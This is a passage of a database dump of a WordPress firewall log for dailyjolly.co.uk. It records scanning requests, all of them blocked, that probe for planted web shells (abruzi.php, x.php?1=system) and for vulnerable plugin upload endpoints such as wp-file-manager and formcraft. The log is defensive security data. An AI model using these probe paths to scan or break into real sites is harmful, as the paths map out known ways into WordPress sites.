User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kenMtem9vbXNvdW5kcy94by5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12077,1674841810.906296,1674841810.795400,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/dzs-zoomsounds/abruzi.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kenMtem9vbXNvdW5kcy9hYnJ1emkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12078,1674841809.483007,1674841809.374600,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/dzs-zoomsounds/abruzi.php4','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kenMtem9vbXNvdW5kcy9hYnJ1emkucGhwNA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12079,1674841808.347337,1674841808.238200,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/dzs-zoomsounds/king','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kenMtem9vbXNvdW5kcy9raW5n\",\"category\":\"brute-force\",\"ssl\":1}'),(12080,1674841807.376634,1674841807.203400,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/dzs-zoomsounds/xo.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kenMtem9vbXNvdW5kcy94by5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12081,1674841805.724526,1674841805.609100,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/dzs-zoomsounds/abruzi.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kenMtem9vbXNvdW5kcy9hYnJ1emkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12082,1674841804.550333,1674841804.435400,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/dzs-zoomsounds/abruzi.php4','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kenMtem9vbXNvdW5kcy9hYnJ1emkucGhwNA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12083,1674841803.670490,1674841803.559300,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/dzs-zoomsounds/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kenMtem9vbXNvdW5kcy9hNTdiemU4OTMxLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12084,1674841802.738640,1674841802.627200,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/abruzi.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FicnV6aS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12085,1674841801.922936,1674841801.815100,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/king.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2tpbmcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12086,1674841800.968039,1674841800.825800,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXItcHJvL2xpYi9waHAvY29ubmVjdG9yLm1pbmltYWwucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12087,1674841800.077663,1674841799.965100,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvbGliL3BocC9jb25uZWN0b3IubWluaW1hbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12088,1674841797.569591,1674841797.452400,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/admin-ajax.php?action=_ningupload_imageHTTP%2F1.1%27404','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12089,1674841796.851735,1674841796.744400,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/admin-ajaz.php?action=p3dlite_handleuploadHTTP%2F1.1404','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXoucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12090,1674841796.000779,1674841795.871400,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/x.php?1=system','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQveC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12091,1674841795.111181,1674841795.003400,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wpcargo/includes/barccde.php?text=x1x1111x1xxlxx11','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cGNhcmdvL2luY2x1ZGVzL2JhcmNjZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12092,1674841794.247949,1674841794.135800,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/html2wp/abruzi.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9odG1sMndwL2FicnV6aS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12093,1674841793.322568,1674841793.208100,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/admin.php?page=html2wp-settings','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2FkbWluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12094,1674841792.362210,1674841792.251900,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/wp_live_chat/abruzi.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy93cF9saXZlX2NoYXQvYWJydXppLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12095,1674841791.045938,1674841790.919400,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-json/wp_live_chat_support/v1/remote_upload','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWpzb24vd3BfbGl2ZV9jaGF0X3N1cHBvcnQvdjEvcmVtb3RlX3VwbG9hZA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12096,1674841790.370089,1674841790.258900,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/admin-ajaz.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXoucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12097,1674841789.484161,1674841789.366600,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zdXBlcnN0b3JlZmluZGVyLXdwL3NzZi13cC1hZG1pbi9wYWdlcy9hNTdiemU4OTMxLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12098,1674841788.516182,1674841788.401300,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/import.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zdXBlcnN0b3JlZmluZGVyLXdwL3NzZi13cC1hZG1pbi9wYWdlcy9pbXBvcnQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12099,1674841787.860662,1674841787.754300,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/formcraft/file-upload/server/php/files/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9mb3JtY3JhZnQvZmlsZS11cGxvYWQvc2VydmVyL3BocC9maWxlcy9hNTdiemU4OTMxLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12100,1674841786.712613,1674841786.605100,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/formcraft/file-upload/server/php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9mb3JtY3JhZnQvZmlsZS11cGxvYWQvc2VydmVyL3BocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12101,1674841785.460130,1674841785.326600,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/formcraft/file-upload/server/php/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 